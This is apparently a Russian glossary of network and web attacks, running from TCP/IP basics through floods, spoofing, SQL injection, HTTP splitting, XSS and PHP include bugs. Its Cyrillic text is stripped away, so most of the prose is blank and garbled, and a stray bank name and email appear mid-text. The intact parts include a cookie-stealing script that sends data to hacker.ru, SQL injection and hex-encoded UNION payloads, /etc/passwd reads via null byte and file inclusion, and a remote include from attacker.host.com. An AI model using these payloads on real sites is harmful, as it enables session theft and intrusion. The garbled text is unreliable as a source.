

:
     ,      
  ,      . ,   ,    ,        
     ,   . 

  :      , ..  . 
    , ,     , 
      .    , .. 
            . 
     ,  - 
,       .    
      : 

TCP     ,      ,  
 ,   ,    .  
  .   : -    
    . 

UDP     TCP,      ,   
    ,     .    
 ,  TCP. 

ICMP       . ,   , 
      . 

      ->:    
   SYN- (.. ,     SYN),   
  SYN/ACK- (  ,     
),     ACK-,    
.   ,     
  ,        
   . 

IP        ...,      
0  255. 

MAC     ,    .  : :::::, 
     00  ff 

:    ,     
 (..    ),  IP  0.0.0.0 
 255.255.255.255  IP     ,  
  , ..   (.. ) IP  
.         
. 

TCP/IP           . 

ARP     IP  MAC . 

ARP    ,        IP 
   MAC . 

DNS    ,   DNS   (,  , 
        Internet Explorer)   
  (: yandex.ru)    IP  (: 
23.145.14.155). 

         : 
    (, )  .  
  .   ,    
  ,    ,     
  .   ,     
,      ,    . 
   ,      . 

     ,      
. 

Deface/Defacement ( )     -   - 
(, )   (    ). 

Privilege escalation ( ).    
 ,    , (: , 
 ).   ,  ,  
    . ,      
,    .      
   ,        
 . 

   .     
     .
  

1. Phishing ( ).   .    ,   
   (,     ..)  . 
      ,   . ,  
         - 
.          , 
 -  -  .   ,  
 ,         
   ,      ,  
 ,       ,   .  
,      , , , 
  .  ,     
 ,  .      
     ( ,     
  ).
: ,      .    
,     .     
 ,        .   
         . 

2.       ,   .  
,   ,    - 
 (,  )      
  , , .   ,    , 
    ,         
  .  ,    , 
     .
:   .    ,   
  .   ,      ,  
       ,     
  . 

3. .     .    
    .     
    ,   .    -   
   ,  DDoS ,      
  .     ,   
      ,     
   Windows .    ,  
    .      , 
      http://school8.uriit.ru/people/av/class.html 
     .      
  http://fivt.krgtu.ru/kafedri/mo/site/ANTIVIRUS/pages/02.htm.
:   .    DrWEB  
Kaspersky Anti-Virus (     ),  
   Malware,  Ad-Aware, SpyBot, XSpy.  
            
 .     ,    
 .    ,  ,   . 

4. DoS (Denial of Service    ).    ,  
    ,   ;    
     .      
   - ,     
.  ,     
.   ,  DoS,    ,     
Flood       ,      
   DoS.   , :
1.   ,    ,   
 ,        ,  - 
 .
2.    ,         Flood, 
,   Buffer Overflow.
, DoS     . :  
       Flood . 

5. Flood (  /).    ,   
   DoS,       .   
  (      DDoS Distributed Denial 
of Service.      ),     
      (,   
).         ,     
   , ..  ,   
 . :      , 
, ,      . 
    Flood:
1. SYN Flood        SYN.  , 
        SYN/ACK.   SYN 
 ,            
   .
2. ICMP Flood  Ping Flood     ,   ICMP.   
   ,      ,  
  ( ) .
3. Identification Flood (Ident Flood).   ICMP Flood,     
  113  identd     ,    
.
4. DNS Flood      DNS .   DNS ,  
    ,  ,       
  .  ,      .
5. DDoS DNS     ,       . 
 ,      ,   ,    , 
       (    
). ,     DNS-   ,  
  DNS , ..      DNS,    
     .  ,   ,  
,      .
6. Boink (Bonk, Teardrop)        
 ,      .   
    ,     
   ,     .  
        
   .
7. Pong     ,       ,  
  ,    .     
.
:      ; ,  ,   
 .   ,    
 .  ,     ,  
 .     ( ) 
  . 

6. Smurf (,     TCP-IP ).  
    ,  ,  TCP-IP   
 ,      ,  
, ,  IP . ,      
 .    TCP Smurf, UDP Smurf, ICMP Smurf. 
,      .
:  CISCO   ,    
,       ;   
 . 

7. Ping-of-Death ( Jolt, SSPing)      ,   
  ICMP ,      (64). 
  ,  Windows 95, .      
  Shadow Security Scanner.
:    ,    . 

8. UDP Storm (UDP )      ,      
  UDP ,      - . 
,  37   time       . 
  UDP      ,    
       UDP  .  
     ,   . 
 ,       (, - 
 ).
:     ,   
UDP ,        . 

9. UDP Bomb      UDP     
 .       (,  
 , ).      .
:  . 

10. Land        ,    
   ,   ,      
. (: : 1.1.1.1  111 : 1.1.1.1  111). 
     ,     
.       100%    
. 

11. Mail Bombing (  ).      
 ,          
    .   ,   Flood,    
,     ,    
 ,        
       .  ,  
         ,  
  DoS. ,   ,  ,    
     .
:    . 

12. Sniffing (   ).   ,   
    ,    
   ,          
 .      ,     , 
     ,   ,   
  ,  ,  .   
           
  ,    .    
 ,  TcpDump (  *NIX ), WinDump ( 
Windows,   ),      ,  
Iris.
:    ,  . 

13. IP Hijack (IP ).      ,   
            
 ,          
.   ,     ,  
 ,        . 
     ,   ,   
  ,       ,  
       .   
   ,     ,  
       ,       
        .  
,     ,    
    .
:     , ,  . 
 . 

14. Dummy ARP ( ARP). ARP ,      
IP  MAC  (..  ).    
  ,    ARP       
  ,   IP.    ,   
,   .  ,    ,  
    IP  (      2 
      IP ).
:  ,     MAC   IP, 
  - ARP . 

15. Dummy DNS Server ( DNS ).      
 ,     ,    (.. 
  )    DNS ,     
   DNS .      , 
       ,   
  DNS .        
  . ,         
,       ,    
  .      .  
 ,       ,  DNS 
.
:       . 


16. Fuzzy ().         
,  UDP.     ,    
,    UDP    ,     . 
 ,     .      
   ,  ,      
 .       , .. 
 ,        - 
,    . ,      
   (   UDP),       
  , .. UDP,           
. ..          . 
    ,         .
:        
   . 

17. Puke      ICMP unreachable (  ), 
      .    
 ,   ,  -    
     . 

18. Fake unreachable       ,     
  (unreachable),     ,    
      .     
 .   ,    17,  
   ,   . 

19. IP-Spoofing (   IP ).    
 IP .  ,       
 IP .      IP    
  ,   .      -. 
 ,       ,  
,          
 .          
    .
:    ,   ,    . 
  ,    (    
)        SYN  
ACK,      SYN-   
   (tcp_max_backlog).     SYN-Cookies. 

20. Host spoofing ( ).   ,   
  .    ,     
 ,      .   
    redirect ,   
     .   
       ,   
        .
:         . 
,  ,     (..  )   
  . 

21.  .          
 .   :      (BruteForce) 
   .    , ..    
 ,        ,   
  ,         .. 
  ,     ,      , 
: -- ,       . 
,       ,    , 
    - .  , ,   . 
    ,        
,    .        
 .
:   ,    . 
    .     
  . 

22. Back Connect/Pipes/Reverse (   ).   
,       . ,     
      .    , 
  .    ,      
   .      
  telnet [ip..] [].   ,  
     (   /Shell)  
 . 

23. Software vulnerabilities ( ).     
.    .      
    .       
  .     ,     
  ,     .    
  ,  ,      .
:    ,     -  
     .       
   . 

24. Buffer Overflow ( ).    ,   
 ,            
    ,    .     
,   ,        
 .          
,     .      
 .       , ..   
     ,    , 
  .     
 (andr[at]sandy.ru)         
 .    ,      
   .       .
1.     
2.       
3.        
4.   
5.    
6.      
7.       
8.   
9.    
10.      
11.       
12.   
13.     
14.       
15.        
         : Integer 
Overflow ( ).      
    :     
:    Basic Integer Overflows   Blexim. 

25. Shatter    Windows ,      
.     ,       
:     .   ,    
  Windows,      ,     
 .          
    ,  50.     
   50,    Windows   Messages (). 
   Header (  (,   
 ))      SETTEXT ( )  ( 
 )   .   ,    
   50, , ,    50- , 
      .     . 
      AMD Athlon 64,     
,       . 

26. Nuke (WinNuke  ).    . Windows   
  NetBIOS         . 
     TCP  (137, 138, 139).    
   Windows  .   ,     
 139   OutOfBand   .    
      .    
   ,     Shadow Security Scanner, 
     ,    SSPing. 

27. Cross User Attack ( ).     
 , ..      ,     
 ,  . Squid 2.4  ISA/2000  
    TCP   .   
  HRS ( )    ,     
      . 

28.   CGI.  WWW ()     
      
 . ,  ,  mail.ru   
    CMS (Content Management System   
  ()).       
    ,    
     .     
      CGI . : http://host/cgi-bin/helloworld?type=A*100 
(..  A    100 ).   http://www.opennet.ru/base/sec/linux_sec_guide.txt.html 
   ,       
,      CGI .  
   ,    ,    
     .       
     ,   ,  , 
 ,       . 

29. SQL Injection (SQL ).     
   SQL   ,    
 ,         SQL . 
:   SELECT login, password FROM members where email= $email ; 
 $email    ,     
  .        : my@mail.ru' 
OR login LIKE '%admin%.  ,  SQL  : SELECT 
login, password FROM members where email='my@mail.ru' OR login LIKE '%admin%';. 
 ,     ,  login  
 admin. 

30. HRS (HTTP Resource Splitting)         
  (      XSS),   
   Hijacking Pages, Cross User Defacement, Web Cache 
Poisoning, Browser Cache Poisoning, XSS (  ).    
,  ,   HTTP    -, 
  HRS,   (  )   HTTP 
 (  ,       ).  HTTP  
    ,     
!   ,    ,   
  .       - 
  ,     -   
  (, -  ). !   
 HTTP  (  )   HTTP  ( 
 )!  ,  ,     
   -    ,       
    (  ).    
,     ,     
,  , , cookie  .    
,     HRS,         
  ,          HRS. 

31. Cross User Defacement      ,    
 ,          
.           .  
,        HRS.   
        , IP , 
     -,       
  .      
 . 

32. Web Cache Poisoning     ,    ,  
   .  ,    , 
 ,        
  ,    -.     , 
       .    , 
      ,   
   . 

33. Browser Cache Poisoning.       ,     
.        ,   Web Cache Poisoning,  
  ,      . 

34. Hijacking Pages           
,          , 
 -,  ,     -, 
   .  ,   
  ,   .    
      .   ,  
 TCP     (  ), TCP  
     ( )  TCP   -  
  ( ).  :
1.       (  )   ,  
 -      1   2  ( HRS).
2.           -.
3. -  1   2    .
4.   ,  1           
  .
5.          .     
    ,    .
6.      -   ,     
 2    -.
7.        2       .
8.        2    .
9.         -      .
10.        2  -   ,  
        2 .
11.         . ..   
 ,   ,   .
        ,     
    ,      .  , 
      ,       
  ,    .    
,      , ,  
 ,        . 

35. CSS/XSS (Cross-Site Scripting   ). ,    
 Microsoft ,    Java Script  . 
 , Java ,    ,   . 
  ,        
   . ,      
      cookie   
.          
          
 ,   . , cookie  !    
   : 

Javascript
<script>img = new Image(); img.src="http://hacker.ru/snf.jpg?"+document.cookie;</script>
,       snf.jpg,        
      document.cookie .  , 
 ,   ,    
  (,  ),     cookie, 
         .  
      ,     , 
     (  ,  JPG) .  
    ,     (: photo.jpg )  
 JAVA .     XSS,     
  ,   Java Script   . , 
      . 

36. SiXSS (SQL Injection Cross Site Scripting).    
SQL Injection  XSS, ..    XSS     
SQL Injection.    ,    MySQL   
  ( 0)  . ,  SQL   
,     

Javascript
<script>alert("SiXSS");</script>
 3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E.  
    SQL Injection ,      : www.victim.com/vuln_script.php?vuln_variable=1+union+select+0x3C73637269 
70743E616C6572742822536958535322293B3C2F7363726970743E  ,   
vuln_variable  vuln_script  ,      
  .        SiXSS, 
 ,    .   ,   
 .    ,    
    .    XSS    
 ,   .  ,    
    ,        
          
,        ,   
 . ,    ,      
,      SQL ,  UNION ,   
   :      , 
 . ,  %F1%F1%FB%EB%EA%E0   
 ,       .  ,  
   ,    .  
,        ,  
  ,   SQL    
. ,     ,    
  ,   JAVA.      
.     ,     
   ,        Apex Bank 
PLC ,      apexbnkplcc@yahoo.co.uk ,    
,           
  .        
  ! 

37. SiHRS (SQL Injection HTTP Resource Splitting)     HTTP 
Resource Splitting     SQL Injection.   
,  , ,  ,    SQL   
HTTP ,      HTTP      
SQL  HTTP      Location:   HTTP .  
    - .    
 HTTP ,      SiHRS  
 . 

PHP 
Select HEX('i.php'
Content-Length: 0 

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html></html>'); 
   ,        692E7068700A436F6E74656E742D4C656E6774683A20300D0A0D0A485... 
       ,      
SiXSS. www.victim.com/vuln_script.php?vuln_variable=1+and+2%3d%34+union+select+ 
0x692E7068700A436F6E74656E742D4C656E6774683A20300D0A0D0A485  

38. NULL Byte (  ).       
PERL.   ,  Perl   \0 (HTML  - %00)   
  .    ,     .  
   . ,  Perl :

Perl
$filename = $query->param('filename').'.dat'; open F, $filename; 
,    ,  filename  ,   org ,  
Perl    org.dat,     /etc/passwd%00,  
Perl      /etc/passwd\0.dat.     
   open, ,   ,  \0  
     .dat      /etc/passwd . 

39. Include Bug      .   
            
 include($file);  $file  ,    
,  http://victim.com/news.php?file=somefile. ,  
 include();    somefile.  ,  
     ,     - 
 http://victim.com/news.php?file=/etc/passwd    . 

40. PHP-Include Bug        ,  
     Include Bug,   ,     
,         - ,  
       PHP . ,    
PHP ,    (, , <?   ?>  <?php   ?>) 
   -,      -, 
 . ..         PHP 
Include. ,    

PHP
include($file); 
        $file (  
,     Include Bug).     
,     PHP ,       
.        -    http://victim.com/news.php?file=http://attacker.host.com/php_code.php 
  PHP         -. 

41. Hidden Fields (  ).    , ,  
 .     ,   
 ,     ,     
.      HTML  : 

HTML
<input type="hidden" name="price" value="10">
.
  ,       ,    
     ,    .
:   ,    .